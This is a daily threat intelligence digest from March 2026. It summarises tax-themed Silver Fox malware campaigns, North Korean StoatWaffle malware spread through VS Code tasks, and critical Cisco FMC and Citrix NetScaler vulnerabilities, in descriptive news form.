Cyware Daily Threat Intelligence, March 24, 2026

The China-nexus group Silver Fox has successfully transitioned from opportunistic financial theft to a high-tier APT operation, now targeting South Asian government and financial sectors with surgical precision. By masquerading as official national taxation authorities, the group delivers its modular ValleyRAT and HoldingHands backdoors through a complex kill chain that has recently evolved to include Python-based stealers disguised as WhatsApp applications.

The Contagious Interview campaign has evolved to exploit the trust inherent in developer workflows by weaponizing Microsoft VS Code to distribute a new malware family called StoatWaffle. This chain eventually deploys a modular framework capable of stealing browser credentials and macOS Keychains, proving that the simple act of reviewing a project's source code can now lead to a total workstation compromise.

A critical "perfect 10" vulnerability in Cisco Secure FMC has triggered a rare emergency patching mandate from CISA, following revelations that it was exploited as a zero-day for over a month. Tracked as CVE-2026-20131, this insecure deserialization flaw allowed the Interlock ransomware group to execute arbitrary Java code as root.

Top Malware Reported in the Last 24 Hours

Silver Fox conducts tax-themed malware campaigns

Silver Fox, a China-based intrusion group, has evolved from financially motivated cybercrime to sophisticated APT-style operations since 2024. Utilizing modular malware like ValleyRAT and HoldingHands, the group conducts dual campaigns targeting both financial gain and espionage. Their tactics involve culturally relevant phishing lures, such as impersonating national taxation authorities, to gain initial access to victims across South Asia, including Taiwan, Japan, and Malaysia. Throughout 2025 and 2026, Silver Fox's operations transitioned from deploying malware via malicious PDFs to leveraging misconfigured RMM tools and, most recently, a Python-based stealer disguised as a WhatsApp application. 

Contagious Interview drops StoatWaffle malware

North Korean hackers, linked to the Contagious Interview campaign (WaterPlum), are exploiting Microsoft VS Code to distribute a new malware family called StoatWaffle. This malware utilizes the "tasks.json" file and the "runOn: folderOpen" option to execute automatically when a project folder is opened. StoatWaffle features a stealer that captures browser credentials and a remote access trojan (RAT) that executes commands on infected systems, targeting both Windows and macOS. The threat actors also deploy malicious npm packages and compromise GitHub repositories to spread malware. Their tactics include social engineering through fake job interviews aimed at high-level professionals in cryptocurrency and Web3 sectors. 

Top Vulnerabilities Reported in the Last 24 Hours

Citrix urges urgent patching for vulnerabilities

Citrix has released critical security updates for vulnerabilities in NetScaler ADC and Gateway, notably CVE-2026-3055, which has a CVSS score of 9.3. This flaw allows unauthenticated remote attackers to exploit an out-of-bounds read and potentially leak sensitive data from the appliance's memory, particularly if configured as a SAML Identity Provider. Another vulnerability, CVE-2026-4368, with a CVSS score of 7.7, involves a race condition that can lead to user session mixups, affecting devices configured as gateways or AAA servers. The vulnerabilities impact several versions of NetScaler ADC and Gateway, including 14.1 and 13.1.

Patch this Cisco bug, urges CISA

The CISA has instructed federal civilian agencies to urgently patch a critical remote code execution vulnerability (CVE-2026-20131) in Cisco Secure Firewall Management Center (FMC), which has a maximum CVSS score of 10. This vulnerability allows unauthenticated attackers to execute arbitrary Java code as root and was exploited by the Interlock ransomware group as a zero-day since January 26, 2026. Cisco issued a patch on March 4, and CISA added the CVE to its known exploited vulnerabilities catalog on March 19, giving agencies only three days to address it. Attackers leveraged this flaw for persistence and lateral movement, utilizing various tools and techniques, including PowerShell scripts and custom remote access trojans, to maintain control over compromised systems.